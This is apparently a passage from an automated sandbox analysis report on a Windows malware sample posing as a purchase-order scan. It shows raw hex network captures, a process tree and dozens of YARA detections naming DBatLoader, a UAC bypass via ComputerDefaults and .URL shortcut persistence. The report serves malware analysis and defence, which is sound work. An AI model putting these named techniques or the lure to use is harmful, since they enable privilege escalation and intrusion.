Last-Modified: Mon, 25 Jul 2022 02:21:51 GMT
Accept-Ranges: bytes
Content-Length: 374272

2022-07-25 13:51:39 UTC 740 IN Data Raw: 83 24 5a ca 39 ca ca ca ce ca ca ca 35 35 ca ca 82 ca ca ca ca ca ca ca 0a ca ca ca ca ca ca ca ca ca ca ca ca

2022-07-25 13:51:39 UTC 748 IN Data Raw: ca ca f7 b2 43 b9 c2 3d 40 3b 82 3d ca ca ca c1 92 7c 35 9c ac 52 89 1b f7 aa 43 30 3b fa 41 30 bf 79 c6 45 ed

2022-07-25 13:51:39 UTC 755 IN Data Raw: 9c 21 1b bf 0f 21 21 c1 0e ee d2 b2 d7 c4 35 35 91 8c ce ca f9 89 20 8d bf f9 bf a0 bf 05 b2 6c 35 35 35 c1 49

2022-07-25 13:51:39 UTC 763 IN Data Raw: 8a 35 5b 2a 0b 0c ca c1 8a 35 5b 26 0b 0c ca c1 8a 35 5b 22 0b 0c ca c1 8a 35 5b 22 0b 0c ca c1 8a 35 5b 1e

2022-07-25 13:51:39 UTC 771 IN Data Raw: 5f 27 95 f9 4a 2f 1a 45 bb ff c8 35 35 84 d2 ca ca ca ef da ca ca ca c3 ab dd 1f fc be 35 35 ed 37 21 cc ed ca bf

2022-07-25 13:51:39 UTC 779 IN Data Raw: 82 0c ca b2 df d5 35 35 c1 92 c1 49 c1 90 b2 cc 6c 35 35 c1 8b a6 d7 ee 82 0c ca b2 8f 9e 35 35 bb 8a 3e f4

2022-07-25 13:51:39 UTC 787 IN Data Raw: 9c ab 2b bf de ee b9 06 ee ca 45 4e db 37 ca ca c1 ce ee b9 42 de ca 45 4e 62 37 ca ca c1 ce ee c1 22 de 4a

2022-07-25 13:51:39 UTC 794 IN Data Raw: 22 35 35 1f ac ca ca ca c3 8b b6 d7 5a bf 0c ca b2 2a b5 35 35 c1 83 b6 7c 37 d7 82 17 0a ca b2 5b 03 35 35

kBytes
Timestamp Direction Data
transferred

2022-07-25 13:51:39 UTC 802 IN Data Raw: bf 8b be 1f c1 ca ca ca c1 7b c6 c1 0a d2 45 80 ca 69 9c bf 7b ba bf 8b be 21 42 c1 7b c6 c1 0a d2 45 ed ca 69

2022-07-25 13:51:39 UTC 810 IN Data Raw: 8f 22 35 35 c1 8b 6e c1 90 b2 6d ea 35 35 1f f5 ca ca ca c3 8b 6a c1 79 d2 45 80 ca b2 06 22 35 35 c1 8b 6a

2022-07-25 13:51:39 UTC 818 IN Data Raw: 81 b9 31 35 ab b2 69 8a 24 8f 8f 2e bf da 32 62 0e 77 ca 32 7a 8c 0c ca b2 f6 5b 35 35 f9 1f 34 2f c8 35 21 b8

2022-07-25 13:51:39 UTC 826 IN Data Raw: bc c1 a2 69 8a 8b 32 ba 99 77 ca 2e 35 fa 2e bf ea c3 7b c6 c1 0d b2 50 b4 c8 35 c1 83 c6 c1 a0 c1 f9 b2 48

2022-07-25 13:51:39 UTC 833 IN Data Raw: c1 e2 35 89 d6 c1 7b a6 bf 7b a2 c1 7b a2 bb 8a 3e 3b b9 b2 ce c1 ca c1 8b c2 bb 9c 3e 3b b9 b4 ce c1 dc 39

2022-07-25 13:51:39 UTC 841 IN Data Raw: ca b2 a5 f6 35 35 b2 bc c8 35 35 82 aa 8c 0c ca b2 2a f6 35 35 82 96 8c 0c ca b2 c0 88 c8 35 69 8a 24 8f 8f 2e

2022-07-25 13:51:39 UTC 849 IN Data Raw: 7b c6 b2 28 52 c8 35 c1 7b c2 b2 20 52 c8 35 69 8a 8b 32 de 8c 77 ca 2e 35 fa 2e bf ea c3 8b be c1 7b c6 b2

2022-07-25 13:51:39 UTC 857 IN Data Raw: bb 8a 46 f4 0a c3 1e ee d2 c3 16 ee 12 45 80 fc 45 80 6f 61 2d bb c0 3e da bb c0 48 3d 88 37 ca ca ca 21 79

2022-07-25 13:51:39 UTC 865 IN Data Raw: ca 0c a5 3e 32 ca ca ca ca 35 35 35 35 3d ca ca ca 18 9b ab 3e 3c 97 36 ca 89 20 c1 a4 c1 ba c1 f9 c1 a0 b2

2022-07-25 13:51:39 UTC 873 IN Data Raw: ca b2 19 5d c8 35 c1 bb ea 35 35 35 24 b2 11 bc 35 35 32 fe ea 0c ca 35 00 32 2a ea 0c ca c3 bb e2 35 35 35

kBytes
Timestamp Direction Data
transferred

2022-07-25 13:51:39 UTC 880 IN Data Raw: c1 bb 86 c8 35 35 1a c3 bb 82 c8 35 35 84 6a 2e 0c ca b2 5c c6 33 35 c1 bb 82 c8 35 35 24 b2 d8 13 35 35 c3

2022-07-25 13:51:39 UTC 888 IN Data Raw: ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca ca

2022-07-25 13:51:39 UTC 896 IN Data Raw: ca 16 13 cc ca 2c 13 cc ca 40 13 cc ca 54 13 cc ca 66 13 cc ca 7c 13 cc ca 90 13 cc ca 9c 13 cc ca aa 13 cc

2022-07-25 13:51:39 UTC 904 IN Data Raw: 73 b9 73 cf 73 d3 73 d7 73 db 73 df 73 e3 73 e7 73 88 73 c8 73 3a 08 ad 08 58 08 5c 08 60 08 64 08 68 08 6c

2022-07-25 13:51:39 UTC 912 IN Data Raw: 57 4e 25 25 c4 b0 1f c2 c8 ae 35 ae 35 aa c8 1f 31 23 19 ae 23 c2 17 84 27 33 02 c8 c2 b0 2f ae 33 ba 23 2f 1f

2022-07-25 13:51:39 UTC 919 IN Data Raw: a3 ec 87 4f 2b 1a 95 d1 4d e9 e8 2c c4 80 05 fe eb 77 1a 7a 5f 11 45 68 60 11 19 20 51 d7 90 6e 97 d2 0d 5c

2022-07-25 13:51:39 UTC 927 IN Data Raw: 8e f3 50 af 9e ea 47 5c 9f 2e ed de f0 4a cb ee 1e 1c d7 15 f7 da 3d 7c 84 89 f3 3b 26 3c 25 52 e1 6d 12 93 8f

2022-07-25 13:51:39 UTC 935 IN Data Raw: be 74 97 73 a7 90 42 50 3b fd 78 a0 6a 84 83 02 9c e4 e3 cb 1e ed 2e 5f 96 a8 a1 b9 f0 e2 5b 10 2e 62 a1 85

2022-07-25 13:51:39 UTC 943 IN Data Raw: d6 fd ce 5c 8d 23 ae 69 23 1e de 32 3d cd 99 01 1b 24 75 17 d9 32 c2 b5 f8 a7 c1 a0 db 23 69 3f a7 82 c2 e3

2022-07-25 13:51:40 UTC 951 IN Data Raw: 31 d0 df b4 7f a4 01 39 1a 4f e3 6b 65 04 c0 a0 d2 f4 15 e6 ea 58 b7 80 44 14 da 23 b8 7d 69 20 d2 79 6a 8d

2022-07-25 13:51:40 UTC 958 IN Data Raw: c9 ed 60 dc 9c 23 9b 59 eb 12 ce cc a8 7b a2 74 a3 ad 62 05 46 95 db 0d c8 cf 4d 74 52 25 74 79 8a 3b 43 8b

2022-07-25 13:51:40 UTC 966 IN Data Raw: 8c 34 ff 3f b0 8c 01 61 3d 6a 7e f8 6d c8 a7 49 7c d2 c7 97 84 a1 7f 92 c1 98 33 e0 92 6d 24 44 2b 87 54 c0 06

2022-07-25 13:51:40 UTC 974 IN Data Raw: e5 ed a4 ee 69 a9 8b 41 79 2c 42 3c 78 20 82 57 77 c8 d9 0b 8d d4 1d 88 37 cb 26 5f ea 15 d6 8d cc 35 f9 fe

2022-07-25 13:51:40 UTC 982 IN Data Raw: 2d c5 65 63 99 dd b1 b5 9f f9 0e 41 31 fe 0f 50 67 db 6d 42 44 78 7c d0 40 0b 1b a8 da b9 d6 13 d9 f3 37 34

2022-07-25 13:51:40 UTC 990 IN Data Raw: 13 12 94 7c 5f 62 5e 1d fb 62 b8 8b f2 7d f4 23 ac d7 79 25 30 bd 90 9d 35 0c 02 71 f6 f6 e5 c7 77 04 74 cd 76

2022-07-25 13:51:40 UTC 998 IN Data Raw: b3 ac 10 56 9c 6f f7 05 cd ea 43 49 56 16 b0 2e d9 3d c3 db 1b c7 2a 1b 0a 60 50 3b d9 d5 f0 33 f6 3c 34 75

2022-07-25 13:51:40 UTC 1005 IN Data Raw: f0 c8 f0 79 17 7f e2 47 73 2c 73 3c 2d 37 9d 9b 47 0d 5c 8a 16 37 97 55 d0 26 c4 b5 98 97 aa d9 6a 55 e3 6a

2022-07-25 13:51:40 UTC 1013 IN Data Raw: 2d 25 e7 c2 9e 74 cd 98 63 48 a6 50 a9 74 b7 b8 82 20 f5 88 29 0d 64 b6 bb 7d 69 3b d2 72 82 34 95 1e 7a 15

2022-07-25 13:51:40 UTC 1021 IN Data Raw: 4b 65 93 d3 3a b6 61 59 85 2c 4e ca 3e 2b 72 a5 7c 0e de 1f 8f 2e 30 6e a9 fa 56 9e 65 62 09 ab e8 ff 04 31

kBytes
Timestamp Direction Data
transferred

2022-07-25 13:51:40 UTC 1029 IN Data Raw: 88 d4 25 a8 f4 55 1d 2a 06 b8 33 ae 49 d9 a6 d4 3c fb f5 9f f9 c7 5f 99 fc b1 c9 74 9f 97 46 6c 4b 2e 8f 9c c4 39

2022-07-25 13:51:40 UTC 1037 IN Data Raw: 16 a6 98 2c 82 08 c8 ec 3b a1 e0 c3 9e d3 4b 6e b8 ae 92 35 b6 cf 7b 7a 10 05 11 a2 dd 36 2c 39 9a b4 52 e6

2022-07-25 13:51:40 UTC 1044 IN Data Raw: b7 8e da cb e0 00 a4 1a 35 b7 da f4 7b 5d d9 ff f4 d7 0c e6 68 7d 4f 5c b3 70 c0 22 aa ec 7b 44 b0 de be 20 ff

2022-07-25 13:51:40 UTC 1052 IN Data Raw: 36 c6 02 44 75 dc 5e 22 11 e7 91 0d d7 5b 4c 7d 1b 4b 65 9b e5 52 dc dc df 0c a0 1e 5f aa 49 42 d8 b4 36 68

2022-07-25 13:51:40 UTC 1060 IN Data Raw: 34 7f 7d 8d db 64 7e bf 89 d9 4c 21 4f 75 3c 3b 1a 27 dc ff ee 77 94 f7 a3 dd c3 e1 fb 57 a1 f9 4e 58 da a6 74

2022-07-25 13:51:40 UTC 1068 IN Data Raw: ba 0f bf fc c8 5b ce f4 48 fe 72 17 61 5f 1f ca 85 f7 fd 91 84 08 1e d1 15 dc 38 93 1c d3 dd 8e b9 52 46 7b 52

2022-07-25 13:51:40 UTC 1076 IN Data Raw: f1 7a a5 94 4e d7 85 b1 de d7 f5 4e 6c 6f 81 58 a4 fb fd 8f 9d dd 2f 0c fb 9a 55 89 c7 6d 72 49 2a 17 14 4a 5d

2022-07-25 13:51:40 UTC 1083 IN Data Raw: 3d 40 68 2e e2 3e f5 42 1d 6a 80 72 30 66 01 a4 f9 25 2f d4 42 55 7e 0d bc eb d2 23 99 b3 e5 59 8d ee 7f 6f

2022-07-25 13:51:40 UTC 1091 IN Data Raw: 3f 0d 4e a6 5a 97 47 54 85 df 6c 53 27 04 d0 5a 80 d9 96 0d ba 5b 5a e9 fc 87 40 dc 95 71 71 6e 9a 3b f7 30

kBytes
Timestamp Direction Data
transferred

2022-07-25 13:51:40 UTC 1099 IN Data Raw: 4c 6b d2 66 d8 3f 20 fb 6a 78 c3 bc 0b 27 09 68 5f 2f dc 12 c3 da 57 97 d7 b5 d0 20 2d c8 3a af 90 f3 dc f5 46

Statistics
Behavior

• Scan_IMG-Purchase Order.exe
• cmd.exe
• conhost.exe
• cmd.exe
• conhost.exe
• Scan_IMG-Purchase Order.exe
• Scxozm.exe
• 159.exe
• netsh.exe
• conhost.exe
• Scxozm.exe
• rdpvideominiport.sys
• WerFault.exe
• rdpdr.sys
• tsusbhub.sys
• Scxozm.exe
• Scxozm.exe

Click to jump to process

System Behavior

Analysis Process: Scan_IMG-Purchase Order.exe PID: 1476, Parent PID: 3396

General
Target ID: 0

Start time: 15:50:49

Start date: 25/07/2022

Path: C:\Users\user\Desktop\Scan_IMG-Purchase Order.exe

Wow64 process (32bit): true

Commandline: "C:\Users\user\Desktop\Scan_IMG-Purchase Order.exe"

Imagebase: 0x400000

File size: 818176 bytes

MD5 hash: C9EE1D6A90BE7524B01814F48B39B232

Has elevated privileges: true

Has administrator true

privileges:

Programmed in: Borland Delphi

Yara matches: Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.296980990.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.268671897.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.277014378.0000000004D74000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source:
00000000.00000003.268203543.0000000004D6C000.00000004.00001000.00020000.00000000.sdmp, Author: @itsreallynick (Nick Carr)
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.268203543.0000000004D6C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.305432929.0000000004E7C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Copyright Joe Security LLC 2022 Page 46 of 74
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.300337710.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.294526843.0000000004D4C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.277440204.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.281348546.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.268241280.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.295497323.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.301828829.0000000004E44000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.275145009.0000000004D48000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.279199085.0000000004D78000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.281738154.0000000004D78000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.299596147.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.270029546.0000000004D44000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.289989399.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source:
00000000.00000000.250608473.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.267368426.0000000004D6C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.294755789.0000000004D7C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.274813807.0000000004D4C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.271274314.0000000004D48000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.291553342.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.298011694.0000000002A9C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.303407343.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.298701516.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.276287632.0000000004D74000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.271126241.0000000004D78000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.302793701.0000000004E44000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.266958876.0000000004D94000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.271192051.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.270154831.0000000004D70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.277103824.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.278565219.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.267720341.0000000004D94000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.293913878.0000000004D4C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.268615561.0000000004D6C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.267453306.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.305344120.0000000004E44000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.301321070.0000000004E78000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.273534772.0000000004D48000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.303828660.0000000004E78000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.271811539.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.301011209.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.302982895.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.299519775.0000000002A9C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.270356285.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.305070113.0000000004E78000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source:
00000000.00000003.267868293.0000000004D6C000.00000004.00001000.00020000.00000000.sdmp, Author: @itsreallynick (Nick Carr)

Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.267868293.0000000004D6C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.273726334.0000000004D74000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.271898357.0000000004D48000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.267935407.0000000004D44000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.268658835.0000000004D94000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.270733947.0000000004D48000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.296749390.0000000002A9C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.276482619.0000000004D48000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.275791794.0000000004D48000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.304370072.0000000004E78000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.270919608.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.296125349.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.271704669.0000000004D70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.292055794.0000000004D7C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.277814208.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.293454993.0000000004D7C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.271413849.0000000004D70000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.267173796.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.303912032.0000000004E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.296366919.0000000002A9C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.275480791.0000000004D48000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.295765485.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.276051199.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.293808968.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.298273423.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.269348014.0000000004D94000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.266926146.0000000004D6C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.272559939.0000000004D78000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source:
00000000.00000003.266810323.0000000004D6C000.00000004.00001000.00020000.00000000.sdmp, Author: @itsreallynick (Nick Carr)
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.290249154.0000000004D7C000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.267052782.0000000004D44000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
00000000.00000003.269526341.0000000004D48000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Rule: JoeSecurity_UACBypassusingComputerDefaults, Description: Yara detected UAC Bypass using ComputerDefaults, Source:
